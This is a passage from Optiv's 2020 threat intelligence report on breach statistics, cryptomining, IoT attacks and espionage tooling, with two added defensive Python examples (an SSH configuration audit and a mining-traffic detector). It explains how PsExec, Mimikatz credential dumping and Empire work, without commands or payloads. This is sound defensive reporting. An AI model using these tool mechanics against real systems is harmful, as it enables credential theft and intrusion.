2020 CYBER THREAT INTELLIGENCE ESTIMATE

A view of the cyber-threat landscape to help organizations mitigate risk and strengthen their defenses.
Table of Contents

1  Introduction ........ 1
2  Executive Summary ........ 2
3  COVID-19 Update ........ 3
   Impacts ........ 3
   Strategies ........ 4
4  Data Gathering and Analysis ........ 5
   Threat Trends ........ 5
   Phishing and Brand Misuse, Infrastructure and Data Leakage Incidents ........ 6
   Data Leakage Alerts ........ 6
   Vertical Industry Data ........ 7
5  Vertical Industry Breach Highlights ........ 9
   Healthcare ........ 10
   Financial ........ 10
   Retail/Hospitality ........ 11
   Manufacturing ........ 11
   Energy/Utilities ........ 11
   Recommendations ........ 11
6  Attack Tools, Techniques and Procedures ........ 12
   Cryptomining ........ 13
   Recommendations ........ 13
   Internet of Things ........ 14
   Top IoT Attacker Methods ........ 15
   Recommendations ........ 15
   Cyber Espionage ........ 17
   Tools ........ 17
   Recommendations ........ 18
   Malware: Kryptik, Obfuse and Emotet ........ 18
   Recommendations ........ 19
   Malware: Ransomware ........ 20
   Recommendations ........ 21
7  Hybrid Threat Actors ........ 22
   Nation-States ........ 23
   Actors with Criminal Intent ........ 27
   Hacktivists ........ 29
   Commercial Entities ........ 29
8  Data Breaches ........ 30
   Worldwide Privacy Regulations ........ 31
   Regulatory Momentum ........ 31
   Recommendations ........ 32
   Identity and Data Management ........ 32
   Authentication Uptick ........ 32
   Managing Elevated Credentials ........ 33
   Recommendations ........ 33
9  Zero Trust ........ 35
   A Practical Path to Zero Trust ........ 36
   Recommendations ........ 36
10 Notable Breaches ........ 37
11 Dark Web ........ 38
   Dark Web Marketplaces ........ 39
   Dark Web by the Numbers ........ 39
   Recommendations ........ 39
12 Conclusions ........ 40
13 Contributors ........ 41
14 References ........ 42

OPTIV | 2020 CYBER THREAT INTELLIGENCE ESTIMATE
Introduction

The threat landscape is more intense and more complex than ever before. COVID-19 and the resulting shift for many of us to work-from-home has increased opportunities for threat actors and also increased the burden on cybersecurity providers. Many businesses now rely more heavily on third-party vendors, as well, and this amplifies the risks that already existed for companies contending with identity and data management challenges, privacy regulations and the Internet of Things. It is vital for business leaders to understand these developments and the consequent need to protect a larger, more fluid attack surface that is more vulnerable to both internal and external threats than previously was the case.

Beyond that, threat actors also constantly develop and acquire new tools, techniques and procedures, and refine existing ones, in their efforts to identify and exploit vulnerabilities. The best way to protect effectively against malicious activity is to take a comprehensive, integrated and managed approach to cybersecurity, a key component of which is up-to-date threat intelligence. In fact, the most efficient and effective threat countermeasures are based on a detailed understanding of the ever-evolving threat landscape.

This Cyber Threat Intelligence Estimate summarizes key threat activities, threat actors and topics crucial to data breach prevention. It also provides recommendations that business leaders and security practitioners should consider as they make decisions about cybersecurity programs and investments, as well as risk management.

General David Petraeus, US Army (Retired), Partner, KKR and Chairman, KKR Global Institute, Optiv Board Member
Executive Summary

The 2020 Cyber Threat Intelligence Estimate (CTIE) is inspired by national intelligence estimates, which are analytic reports produced by the intelligence community of the United States for consumption by Congress. Evolving technology, threat actors and regulations require security leaders and security practitioners to be familiar with their own environment and assets and stay abreast of the latest global threat trends.

This report comprises contributions from Optiv's Global Threat Intelligence Center (gTIC); VMware Carbon Black; Digital Shadows; Palo Alto Networks global threat intelligence team, Unit 42; and SailPoint.

This CTIE summarizes the following information:

» Vertical Industry Breach Highlights (page 9)
» Attack Tools, Techniques and Procedures (page 12)
» Hybrid Threat Actors (page 22)
» Data Breaches (page 30)
» Dark Web Practices (page 38)

Additionally, a special section on COVID-19 offers insights into security concerns as well as actions that business leaders can take to bolster cybersecurity.

By applying the best-practice recommendations provided in the CTIE, decision-makers and influencers can strengthen their cybersecurity strategies and operations. For organizations that collect and analyze their own threat intelligence, the intelligence assembled in the CTIE can validate and augment their findings.
COVID-19 Updates

The COVID-19 pandemic has had and will likely continue to have profound, long-lasting effects on companies and people. During these uncertain times, an enterprise's security roadmap and objectives remain the best framework within which to make decisions. Existing cybersecurity principles apply now more than ever, especially for industries at high risk for cyber attacks.

IMPACTS

Organizations and industries most crucial to the COVID-19 response, or those already affected by the economic fallout caused by the pandemic, are likely most at risk of being targeted by cyber-threat actors. Digital Shadows analysts point to warnings from governmental and intergovernmental agencies, directed particularly to healthcare businesses and manufacturers of critical medical equipment and personal protective equipment, stating that a disruptive cyber attack will amplify their struggles.

The VMware Carbon Black team analyzed financial services firms and discovered that the cybercriminal community took advantage of COVID-19 in tandem with the news cycle, escalating their coordinated criminal conspiracies. Everyone should pay close attention to these threat actors and thwart their goal: hijacking digital transformation efforts via island hopping.

The following insights and guidance may be useful to business leaders whose employees are working from home. Remote access support via phone, chats and video create new and different vulnerabilities. This massive expansion of the attack surface is a necessity for business continuity, but it comes with security and risk concerns. Workers often are unaware of threats, further increasing risk.

Since January 2020, more than 4,000 coronavirus-themed web domains have popped up, and around 5% were suspicious and 3% malicious.[1]

Digital Shadows blogs describe phishing and social engineering scams, sale of fraudulent or counterfeit goods and COVID-19 cures, and general misinformation.

Many businesses have turned to third-party vendors – for collaboration solutions, for example – to support productivity. Digital Shadows analysts identified potential third-party risks:

» Operational risk involves potential losses resulting from inadequate or failed procedures, systems or policies.
» Transactional risk involves potential losses due to problems with a service and/or its delivery.
» Compliance and regulatory risk result from third-party security breaches.
STRATEGIES

Optiv cybersecurity experts find that employers are pursuing three basic strategies to combat COVID-19:

» Moving workloads to the cloud
» Migrating to software as-a-service (SaaS) applications
» Retooling identity governance
» Enabling mobility/bring your own device (BYOD)
» Applying Zero Trust access methods

Fortunately, providing expanded access services for employees and customers dovetails with common organizational priorities:

» Expand existing access
» Create alternate access methods
» Redesign infrastructure

OTHER ACTIONS YOU CAN TAKE TO MINIMIZE THE IMPACT OF COVID-19

» Provide security awareness training. Make it easy for workers to find documentation about remote access and how to be safe online. Publish a list of approved collaboration tools for chat and online meetings. Supply guidance on which applications can be accessed remotely.

» Deploy and update endpoint security agents. Validate and publish the steps to enroll your remote endpoint security agent. Implement host validation checks to ensure a minimum standard is met before allowing access to sensitive information. And, determine the level of access that will be permitted for personal devices.

» Vet suppliers thoroughly. Make sure security practices match your requirements and monitor third-party applications so incidents can be tracked and resolved.

» Include SecOps management in business-line decision planning related to remote workforce enablement. Your SecOps/cybersecurity teams need to stay on top of changes in traffic flows, peak operating times and new sources of telemetry to incorporate into monitoring tools. A tiger team can best implement the acquisition and monitoring of new telemetry for net-new applications and access methods. Be prepared to coach employees on how working from home will change usual business practices and behavioral monitoring systems.

» Manage user identities properly, including accurate, accessible directory services. Leverage a single-sign-on (SSO) dashboard for application distribution and use multifactor authentication wherever possible. Enhance and expand monitoring and reporting on access to sensitive information.

As you decide how your business will operate during this fluid situation, keep cybersecurity top of mind as you respond to the increased threat level. COVID-19 checklists are available from Optiv upon request.
Data Gathering and Analysis

Security analysts gather, weigh and synthesize data sources to prepare the intelligence analysis that appears in the CTIE. Some of the data is circumstantial, and it is up to the analysts to find multiple, corroborating intelligence data points to assemble a clear picture that describes the threat landscape. Experts from the contributing companies collect cyber-activity statistics from thousands of clients, and the data is summarized here so you can easily understand key activities, events and trends.

THREAT TRENDS

A comparison of 2018 and 2019 threat activity observed by Optiv reveals patterns that indicate shifting trends. In this comparison, a threat is any event that may cause a security incident.

16% fewer threats in 2019 than 2018 in total on average.

Figure 1 - Observed threat activity in 2018 (Optiv). [Bar chart: events per month, January to December; vertical axis 0 to 80,000 events.]

Figure 2 - Observed threat activity in 2019 (Optiv). [Bar chart: events per month, January to December; vertical axis 0 to 80,000 events.]
At the end of 2018, overall threat activity gradually increased before dropping off for a few months. This trend continued throughout 2019 in two large cycles, each made up of two smaller cycles. On a standard fiscal year quarterly basis, aspects of the threat landscape reset and then gradually started to climb. Cumulative highs at the beginning and end of the year point to the idea that threats will continue to occur around specific events and timing-oriented attack patterns to maximize damage. In total, the average threats per day in 2019 appear to be about 16% lower than the threats in 2018.

PHISHING AND BRAND MISUSE, INFRASTRUCTURE AND DATA LEAKAGE INCIDENTS

As organizations and their brands continue to grow, their attack surfaces also grow. Attackers are increasingly targeting and impersonating organizations across all channels. Digital Shadows classifies this activity into three main incident categories: phishing and brand misuse, infrastructure and data leakage. Phishing and brand misuse include malicious and impersonating web domains, as well as spoof social media profiles. Infrastructure includes domain certificate issues and port exposures. Data leakage covers the exposure of sensitive documents, customer details and code on unwanted or unintended sources.

Figure 3 - Breakdown of 2019 incidents (Digital Shadows). [Pie chart]
» Phishing and brand misuse: 67%
» Infrastructure: 24%
» Data leakage: 9%

DATA LEAKAGE ALERTS

Data leakage alerts include unmarked documents, customer details, protectively marked documents, technical leakage and internally marked documents.

Figure 4 - Breakdown of 2019 data leakage alerts (Digital Shadows). [Pie chart]
» Customer Details: 45%
» Protectively Marked Document: 39%
» Technical Leakage: 10%
» Internally Marked Document: 3%
» Unmarked Document: 3%
VERTICAL INDUSTRY DATA

For all incidents reported by Digital Shadows, the majority, 66%, belong to organizations in the technology and financial services sectors. These include alerts for impersonating domains, spoof social media profiles, data breaches and credential exposure, and exposed documents.

66% of incidents belong to organizations in the technology and financial services sectors.

Figure 5 - 2019 Alerts by Vertical (Digital Shadows). [Chart; legend verticals: Financial, Technology, Other, Healthcare, Retail, Oil and Gas, Services, Travel and Leisure, Food and Beverage, Automobiles and Parts, Utilities, Education, Insurance, Personal and Household Goods, Equity/Non-Equity Investment Instruments, Legal Services, Basic Resources, Government.]
Figure 6 - 2019 credentials by vertical (Digital Shadows). [Bar chart: credential theft by industry vertical as a percentage of incidents. Bars in descending order: 41%, 26%, 8%, 6%, 5%, 4%, 3%, 2%, 2%, 2%.]

Figure 6 - 2019 phishing by vertical (Digital Shadows). [Bar chart: phishing incidents by industry vertical as a percentage of incidents. Bars in descending order: 35%, 10%, 10%, 10%, 6%, 5%, 4%, 3%, 3%, 2%, 2%, 2%, 2%, 2%, 2%. Legend verticals as in Figure 5, plus Media.]
Vertical Industry Breach Highlights

Industries at high risk from certain vulnerabilities and threats are discussed below. Optiv's threat actor risk metric system[2] can help you assess risk and develop appropriate countermeasures.

Companies across industries increased their risky use of Secure Shell (SSH), Remote Desktop Protocol (RDP) and Transport Layer Security (TLS). According to Palo Alto Networks analysts, attackers target SSH when it is configured to use password authentication, creating a low barrier to entry. To thwart these attacks, use public key authentication (RSA, ECDSA or Ed25519 key pairs) for all SSH-enabled systems.

RDP operates over port 3389 to enable remote administration of Windows environments. RDP is frequently used as an initial vector for ransomware. Instead of exposing RDP to the public internet, use alternatives such as Virtual Desktop Infrastructure (VDI) or virtual private networks (VPNs) that provide connectivity without exposing public IPs.

TLS is a protocol that provides authentication, privacy and data integrity between communicating applications. There are several vulnerabilities in older versions of TLS. Several certificate authorities have largely deprecated versions 1.0 and 1.1, making it advisable for organizations to support only v1.2 and 1.3.

For cloud operations, a Zero Trust approach is the best practice, regardless of industry type. Cloud service providers are not responsible for managing an organization's cyber risk. Organizations using the cloud must protect their applications and data, but unauthorized access and inconsistent security policies make this challenging. Also, organizations typically use more than one cloud platform. Zero Trust frameworks are built on the notion of "never trust, always verify," meaning that no access is permitted without identification. However, identification alone is not sufficient. After access is established, traffic flow should be inspected continuously.
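The SSH guidance above (key pairs instead of passwords) can be verified against a server's sshd_config. The following audit is an added example, not from the report or its contributors; it assumes OpenSSH keyword names and documented defaults, and the two sample configs are constructed.

```python
"""Audit an sshd_config for SSH that still accepts passwords instead of key
pairs. Assumes OpenSSH keyword names and documented defaults; the sample
configs below are constructed."""

# Effective defaults when a keyword is absent (OpenSSH sshd_config(5)).
DEFAULTS = {
    "passwordauthentication": "yes",
    "pubkeyauthentication": "yes",
    "kbdinteractiveauthentication": "yes",
    "permitemptypasswords": "no",
}
# Deprecated spelling that sshd treats as the same keyword.
ALIASES = {"challengeresponseauthentication": "kbdinteractiveauthentication"}


def parse_sshd_config(text):
    """Return (global_settings, [(match_criteria, settings), ...]).

    sshd keeps the FIRST value it reads for a keyword, so later duplicates
    are ignored here as well. Keywords after a 'Match' line belong to that
    block and apply only when its criteria are met.
    """
    global_settings, match_blocks = {}, []
    current = global_settings
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):  # blank lines and comments
            continue
        # Syntax is 'Keyword value' or 'Keyword=value'.
        parts = line.replace("=", " ", 1).split(None, 1)
        keyword = parts[0].lower()
        keyword = ALIASES.get(keyword, keyword)
        value = parts[1].strip() if len(parts) > 1 else ""
        if keyword == "match":
            current = {}
            match_blocks.append((value, current))
            continue
        current.setdefault(keyword, value.lower())
    return global_settings, match_blocks


def effective(settings, keyword):
    """Value sshd would use: the configured one, else the documented default."""
    return settings.get(keyword, DEFAULTS.get(keyword))


def audit_sshd_config(text):
    """Return findings as strings; an empty list means key-only login."""
    global_settings, match_blocks = parse_sshd_config(text)
    findings = []
    if effective(global_settings, "passwordauthentication") == "yes":
        findings.append("HIGH: PasswordAuthentication is enabled globally; "
                        "set it to 'no' and use RSA, ECDSA or Ed25519 keys")
    if effective(global_settings, "pubkeyauthentication") != "yes":
        findings.append("HIGH: PubkeyAuthentication is disabled, so only "
                        "password-style logins remain")
    if effective(global_settings, "permitemptypasswords") == "yes":
        findings.append("HIGH: PermitEmptyPasswords allows blank passwords")
    if effective(global_settings, "kbdinteractiveauthentication") == "yes":
        findings.append("MEDIUM: KbdInteractiveAuthentication is enabled; "
                        "with PAM this can still prompt for a password")
    for criteria, settings in match_blocks:
        if settings.get("passwordauthentication") == "yes":
            findings.append(f"MEDIUM: 'Match {criteria}' re-enables password "
                            "authentication for that scope")
    return findings


# Constructed sample: a config left close to defaults, with a Match block.
WEAK_CONFIG = """\
Port 22
PermitRootLogin no
PasswordAuthentication yes
ChallengeResponseAuthentication yes
# ignored by sshd: the first PasswordAuthentication value above wins
PasswordAuthentication no
Match User deploy
    PasswordAuthentication yes
"""

# Constructed sample: public key authentication only.
HARDENED_CONFIG = """\
Port 22
PermitRootLogin no
PubkeyAuthentication yes
PasswordAuthentication no
KbdInteractiveAuthentication no
PermitEmptyPasswords no
"""

if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(name, audit_sshd_config(cfg) or ["OK: key-based login only"])
```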
HEALTHCARE

Palo Alto Networks analysts conclude that risk for healthcare companies is elevated because Internet of Things (IoT) device security has declined, leaving organizations vulnerable to new IoT-targeted malware as well as older attack techniques. Analyst research reveals these key IoT concerns:

» Outdated software. 83% of medical imaging devices run on unsupported operating systems – a 56% jump from 2018 as a result of the Windows® 7 operating system reaching its end of life. Just over half (51%) of threats involved imaging devices, disrupting the quality of care and allowing attackers to exfiltrate patient data stored on these devices. This general decline in security posture opens the door to new attacks, such as cryptojacking, and brings back threats like Conficker.

» Poor network hygiene. 72% of healthcare VLANs mix IoT and IT assets, allowing malware to spread from users' computers to vulnerable IoT devices on the same network. 41% of attacks exploit device vulnerabilities, as IT-borne attacks scan through network-connected devices to exploit known weaknesses. Attacks are shifting from IoT botnets conducting denial-of-service attacks to more sophisticated attacks targeting patient identities, corporate data and monetary profit via ransomware.

» Inadequate security function. Biomedical engineers who maintain medical devices often lack the training and resources to follow IT security best practices: password rules, secure password storage and maintaining up-to-date patches.

FINANCIAL

In recent months, as COVID-19 disordered many businesses, VMware Carbon Black analysts observed a 148% increase in ransomware attacks and a 238% increase in attacks against the financial sector. The research shows:

» 80% of surveyed banks said they saw an increase in cyber attacks over the past 12 months, marking a 13% increase over 2019.

» 64% of surveyed financial institutions reported increased attempts at wire fraud transfers, a 17% increase over 2019.

» 82% of surveyed financial institutions said cybercriminals have become more sophisticated, leveraging highly targeted social engineering attacks, advanced TTPs for hiding malicious activity, and exploiting weaknesses in people, processes and technology to gain a foothold and persist in the network, enabling the ability to transfer funds and exfiltrate sensitive data.

Analysts observed a 148% increase in ransomware attacks and a 238% increase in attacks overall.
RETAIL/HOSPITALITY

Retail was heavily targeted during the past year by cyber-based attacks. The most common observed malware families included Emotet, Obfuse and Kryptik. E-commerce sites are favorite targets for cybercriminals that commonly leverage skimming scripts such as Magecart to scrape and exfiltrate payment card information. Criminal threat actors commonly attempt to spoof a legitimate vendor or exploit a vulnerability on the e-commerce vendors' payment page to inject a crafted JavaScript skimmer.

VMware Carbon Black research reveals:

» 40% of retailers lost revenue in 2019 due to cyber attacks
» 73% saw increasingly sophisticated cyber attacks as the year progressed, and 33% of these organizations experienced an island-hopping attack
» 66% of the surveyed organizations experienced a ransomware attack[3]

MANUFACTURING

According to a recent study, 40% of manufacturers were affected by a cyber incident.[4] Verizon provides additional insights:

» 1/3 of manufacturing attacks were made up of internal actors
» 49% of organizations report having credentials compromised
» 68% of documented cases were financially motivated and 27% were espionage related[5]

ENERGY/UTILITIES

Energy and utilities companies were affected by some of the most high-profile cyber attacks between 2015 and 2018. In March 2019, a Utah-based utility company became the first American energy company to see grid operations get disrupted by a cyber attack.[6] Dragos and E-ISAC observed an increase in scans of U.S. and East Asia-based industrial control systems (ICS) by the XENOTIME threat actor.

RECOMMENDATIONS

» Implement network segmentation to limit the attack surface available to an insider threat
» Develop system access policies following the least-privilege principle
» Implement patch management to ensure systems are updated to the latest version
» Apply multi-factor authentication
Attack Tools, Techniques and Procedures

Tools, techniques and procedures (TTPs) are common topics in threat intelligence circles because they are some of the simpler aspects to study. Threat actors use TTPs – which describe the "how" and "what" – to carry out their attacks. The correlation and analysis of TTPs help analysts figure out the "who" and "why." Important TTPs involve cryptomining, IoT attack methods, cyber espionage and malware.
CRYPTOMINING

Palo Alto Networks analysts found that nearly 9% of cloud organizations showed signs of connecting to, and likely performing, mining operations via public Monero (XMR) mining pools. Public mining pools are systems or networks that coordinate, manage and distribute mining operations. Remote systems connect to these pools to receive mining instructions and, upon completion of the operations, receive a share of the resulting financial proceeds.

Nearly 60% of all public XMR mining network connections to XMR pools are located within the United States. Mining operations can evade geographic blacklisting or whitelisting based solely on country or region criteria. They take place often over ports such as 80 and 443, which are meant to avoid corporate firewall rules.

Frequently used tools include:

» Rocke. This tool has evolved cyber operations beyond cryptomining with another tool called Godlua, which performs proxy Lua (a programming language designed primarily for embedded use in applications) scripting operations and various shell operations within cloud infrastructure. Network connections to known Rocke infrastructure trended downward, in part because cloud environments are less reliant on native cloud service provider network controls.

» 8220 Mining Group. The tell-tale signs of 8220 operations within network environments involve the use of port 8220. While port 8220 is an uncommon port for default networked environments, it is possible for port 8220 to be used for custom purposes. Researchers paired network connections like PE-Miner and XMRig from organizations with connections over port 3333, which is a commonly used port by 8220 and known to be used by cryptomining software. Based on known 8220 indicators of compromise (IOCs), Palo Alto Networks analysts found that 21% of cloud organizations had network connections that appeared to have 8220 signatures.

The pattern of cloud system connections over ports 3333 and 8220 to external systems is suspicious because a single destination system was being connected to using two separate ports. And, it is suspicious for destination IP addresses used in the connections not to be routed through DNS name resolutions and instead called directly through their IP addresses.

» Pacha. Pacha competes with Rocke for cryptocurrency mining in the cloud, but activities in 2019 declined significantly. 93% of Pacha cryptocurrency traffic was destined for China, although the specific types of network operations being performed are unknown.

RECOMMENDATIONS

» Use Layer 7 packet inspection signatures via virtual next-generation firewalls
» Integrate virtual network traffic inspection tools
» Apply virtual next-generation firewalls (NGFWs) to block connections to known Rocke infrastructure
» Block 8220 communications by preventing communications with known malicious IP addresses
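The two indicators described for 8220 activity (one external host contacted over both 3333 and 8220, and destinations reached by raw IP with no DNS resolution) can be scored from flow and resolver logs. This detection is an added example, not from the report or Palo Alto Networks; the log layouts, sample records and scoring are constructed assumptions.

```python
"""Score outbound cloud flows for two cryptomining indicators: one external
host reached over both 3333 and 8220, and destinations contacted by raw IP
with no DNS answer for them. Log layouts, sample records and scoring are
constructed assumptions."""

from collections import defaultdict
from ipaddress import ip_address, ip_network

MINING_PORTS = {3333, 8220}   # ports the report ties to 8220 Mining Group

# RFC 1918 ranges: traffic that stays inside the VPC is out of scope here.
# The sample uses RFC 5737 documentation addresses as stand-ins for external
# hosts, so the check is explicit rather than ipaddress.is_private, which
# would also treat those documentation ranges as non-global.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow log: timestamp, source host, destination IP, dest port.
FLOWS = """\
2019-06-01T10:00:01 web-01 203.0.113.10 443
2019-06-01T10:00:05 web-01 203.0.113.10 80
2019-06-01T10:02:11 batch-07 198.51.100.25 3333
2019-06-01T10:02:13 batch-07 198.51.100.25 8220
2019-06-01T10:05:00 batch-07 198.51.100.25 3333
2019-06-01T10:07:42 db-02 192.0.2.77 3333
2019-06-01T10:09:00 web-01 10.0.0.5 5432
"""

# Constructed DNS resolver log: timestamp, client, queried name, answer IP.
DNS_ANSWERS = """\
2019-06-01T09:59:58 web-01 cdn.example.net 203.0.113.10
2019-06-01T10:07:40 db-02 pool.example.org 192.0.2.77
"""


def parse_flows(text):
    """Return (source, destination_ip, port) tuples from the flow log."""
    flows = []
    for line in text.splitlines():
        if line.strip():
            _ts, src, dst, port = line.split()
            flows.append((src, dst, int(port)))
    return flows


def parse_dns(text):
    """Return the set of (client, answer_ip) pairs seen in the resolver log."""
    resolved = set()
    for line in text.splitlines():
        if line.strip():
            _ts, client, _name, answer = line.split()
            resolved.add((client, answer))
    return resolved


def is_internal(ip):
    addr = ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def score_destinations(flows, resolved, mining_ports=MINING_PORTS):
    """Aggregate flows per (source, external destination) and list every
    pair that shows at least one indicator, highest score first. The score
    is simply the number of indicators that fired."""
    ports_by_pair = defaultdict(set)
    for src, dst, port in flows:
        if not is_internal(dst):
            ports_by_pair[(src, dst)].add(port)

    findings = []
    for (src, dst), ports in ports_by_pair.items():
        reasons = []
        hit = sorted(ports & mining_ports)
        if hit:
            reasons.append("mining port " + ",".join(map(str, hit)))
        if mining_ports <= ports:
            reasons.append("same host on both 3333 and 8220")
        if (src, dst) not in resolved:
            reasons.append("no DNS answer for this destination; reached by raw IP")
        if reasons:
            findings.append({"src": src, "dst": dst,
                             "score": len(reasons), "reasons": reasons})
    findings.sort(key=lambda f: -f["score"])
    return findings


if __name__ == "__main__":
    for f in score_destinations(parse_flows(FLOWS), parse_dns(DNS_ANSWERS)):
        print(f"{f['src']} -> {f['dst']} score={f['score']}: "
              + "; ".join(f["reasons"]))
```

A hit on a single indicator (db-02 above, port 3333 to a resolved pool name) is a lead to triage; the dual-port, unresolved destination is what the passage calls suspicious.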
INTERNET OF THINGS

IoT adoption grew to an estimated 4.8 billion devices, up 22.5% from the end of 2018.[7] Palo Alto Networks analysts found that 98% of IoT traffic is unencrypted, exposing personal and confidential data on the network, and that 57% of IoT devices are vulnerable to medium- or high-severity attacks. IoT offers low-hanging fruit due to the vulnerabilities created by low patch levels and aging operational technology (OT) protocols.

According to Optiv IoT experts, IoT cybersecurity received more attention during the past year, in part because ownership shifted to chief information security officers (CISOs). In the past, IoT security belonged to several groups, resulting in isolated initiatives. With greater responsibility and budget control in the hands of CISOs, they can be stronger IoT champions.

An immediate enterprise priority is a unified incident response (IR) platform that incorporates both IT and OT. The lack of a unified IR platform continues to hamstring business continuity and business recovery efforts. Some companies lump IT and OT into the IoT bucket, but OT goes beyond the usual security concerns to include product/manufacturing protection requirements. Attackers tunnel through from IT to OT using paths of least resistance. Once inside, they can linger and eventually access entire environments depending on security maturity.

Some decision makers are pursuing Zero Trust fundamentals to improve IoT cybersecurity. Device visibility received a boost from new tools capable of pulling out vulnerability data. Segmentation gained momentum, but it was limited due to cost, complexity and resource constraints. An alternative is cloaking – a duplicate, disguised network that allows authorized traffic.

Use Cases

Ryuk Ransomware

The Ryuk ransomware took down a United States Coast Guard facility for more than 30 hours in late 2019. The point of entry was a malicious email sent to an employee. After the employee clicked on a link, a threat actor accessed and encrypted critical IT network files, blocking staff access to the information. The virus spread throughout the facility, also impacting industrial control systems that monitor and control cargo transfer, and encrypted files critical to process operations.[8] Ryuk attackers, which reportedly target firms with annual revenue between $500 million and $1 billion, also targeted oil and gas companies, including Mexico's Pemex.[9]

Urgent/11

Urgent/11 is a suite of bugs in the TCP/IP network protocol stacks that devices use to connect to networks like the internet. The code has been around for many years, and the bugs exist in far more platforms than originally believed. Always-on devices common in industrial control settings and the healthcare industry are particularly vulnerable to attacks or takeovers. At least seven affected operating systems run in countless IoT devices.[10]
Top IoT Attacker Methods

The Palo Alto Networks analysts scrutinized cross-industry research and identified these key methods used by attackers to compromise IoT:

» Exploits target device vulnerabilities. IoT devices are used as stepping stones in lateral movement to attack other systems on a network. Attacker activities include network scans, IP scans, port scans and vulnerability scans on networks that attempt to identify potential next-step targets.

» Password attacks. These attacks are fueled by default, manufacturer-set passwords, poor password security practices and operational misalignment. For example, passwords chosen by OT staff are not in line with the more advanced password policies and password management practices used by IT. California's SB-327 IoT law now prohibits the use of default credentials, which will help reduce password attacks.

» Unclosed backdoors. WannaCry ransomware attacks spread through backdoors left open by previous DoublePulsar malware infections. The use of unpatchable devices, such as those running Windows 7, allows these two-stage attacks to continue happening.

» Unsegmented networks. WannaCry cases in healthcare spread in mixed networks with devices such as PCs, scanners and nuclear imaging devices. With strong self-propagation and infection capability, WannaCry cross-infects devices throughout IoT and IT.

» Botnet attacks. The Mirai malware turns networked devices running Linux into remotely controlled bots that can be used as part of a botnet in large-scale attacks. Primary targets are online consumer devices such as IP cameras and home routers. Mirai has grown into a framework to which developers can add new device exploits as new variants.

RECOMMENDATIONS

» Develop an IoT security strategy that encompasses the entire IoT lifecycle and all IoT devices
» Use a vulnerability management process that encompasses:
  » Asset discovery
  » Identification of vulnerabilities in the assets
  » Threat intelligence to prioritize vulnerabilities
  » Patching, configuration management and isolation as remediation methods
» Implement active around-the-clock monitoring
» Discover IoT devices on your network
» Patch printers and other easily patchable devices
» Segment IoT devices across VLANs – micro-segmentation is preferred
2019 NOTABLE IoT ATTACKS

SEPTEMBER 2019: Palo Alto Networks analysts discovered an updated Gafgyt variant attempting to infect IoT devices, specifically small office/home wireless routers of certain commercial brands.

DECEMBER 2019: Palo Alto Networks analysts discovered a new variant of the Muhstik botnet that adds a scanner to attack routers running the open-source Tomato firmware by brute-forcing their web authentication. Muhstik, which has a wormlike self-propagating capability to infect Linux servers and IoT devices, mainly launches cryptocurrency mining and DDoS attacks with IoT bots to earn profit.
CYBER ESPIONAGE

Optiv's gTIC followed cyber espionage, which is cyber activity directed at private and public sector entities with the aim of stealing sensitive or classified data or intellectual property to gain a competitive advantage over a rival organization or country. Threat actors engaged in cyber espionage are sophisticated and often fall under the classification of advanced persistent threats (APTs). Depending on their target, they can exploit a range of vectors to establish a foothold within a target system. These attacks are often preceded by reconnaissance activity. The ramifications of espionage include loss of competitive advantage, sabotage and political instability.

Tools

Threat actors often leverage both in-house and publicly available hacker tools common among many threat groups. This not only frees up time and resources but also makes post-exploitation analysis and attribution more difficult, since a public tool carries no signature unique to one group. Espionage attacks do not differ much from financially motivated attacks, but they can span a longer timeframe. State-sponsored espionage operations are commonly supported by a much larger and more sophisticated infrastructure than those used by criminal actors. Some commonly leveraged public tools include:

» PsExec. This tool is part of Microsoft's Sysinternals suite. It enables system administrators to remotely run commands on and manage their systems over the Server Message Block (SMB) protocol, TCP port 445, by copying a service binary to the target's ADMIN$ share and starting it through the Service Control Manager. The open-source penetration testing framework Metasploit contains a psexec module that reuses the same mechanism: given valid credentials or a captured NTLM password hash, it gives an attacker remote code execution on the targeted machine. Legitimate and malicious use leave the same trail, a new service installation (Windows event ID 7045) on the target, so alerting has to key on which accounts and source hosts are expected to do this.

» Mimikatz. An offensive security tool, Mimikatz is used in the post-exploitation phase of an attack. Its functionality encompasses dumping passwords, PINs, hashes and Kerberos tickets from memory. It works by reading the credential material that Windows caches in the LSASS process to provide single sign-on (SSO). The recovered material enables follow-on attacks including pass-the-hash and Golden Ticket attacks.

» X-Agent. This modular backdoor is leveraged by APT28, a Russian state-linked espionage group with ties to the GRU, Russia's military intelligence organization. Also called CHOPSTICK, X-Agent's functionality focuses on information gathering and includes capabilities such as logging keystrokes, transmitting remote files, taking screenshots and modifying the registry.

Turla Hijacks APT34 Tools

In October 2019, the United Kingdom's National Cyber Security Centre (NCSC) and the United States' National Security Agency (NSA) issued a joint advisory. It stated that the Russian state-associated threat actor Turla used tools and infrastructure linked to the Iranian threat actor APT34. This included the Neuron and Nautilus tools, designed to target mail servers and web servers on Windows. Turla used Neuron and Nautilus to target a range of victims, including a cluster of Middle Eastern organizations.
» Empire. An open-source post-exploitation framework, Empire can operate cross-platform. It has been used by advanced persistent threat actors including APT33, APT19, FIN10 and Turla. Empire can run PowerShell agents without powershell.exe along with a range of post-exploitation modules geared to logging keystrokes, network detection evasion and running Mimikatz in memory. Additionally, Empire's network traffic is asynchronous and blends in with normal web traffic. Development of the original Empire project ceased in mid-2019; a community fork has since continued it, so the tooling remains available to attackers.

» netstat. This operating system utility displays TCP connections, network connections and listening ports. It is common to Windows, Linux and UNIX, and attackers use it for discovery after gaining a foothold.

» Cobalt Strike. A commercially available penetration testing tool, Cobalt Strike has been adopted by several espionage threat actors, including APT29, APT17 and CopyKittens. Its full range of post-exploitation functions presents cyber-espionage actors with a convenient framework.

RECOMMENDATIONS

Enforce a security policy that covers cyber-based, insider and physical-based threats, to stop cyber-espionage threat actors that go to great lengths to access their targets.
Ensure operating systems, software and firmware are patched to the latest updates, with patch management that maintains automatic updates.
Implement multi-factor authentication.

MALWARE: KRYPTIK, OBFUSE AND EMOTET

VMware Carbon Black analysts provided insights into Kryptik, Obfuse and Emotet. This malware is often used in long, complex campaigns whose end goal is to leverage native operating system tools to remain invisible, or to gain a foothold in one system (sometimes a supply chain partner) and island-hop to a larger, more lucrative target.

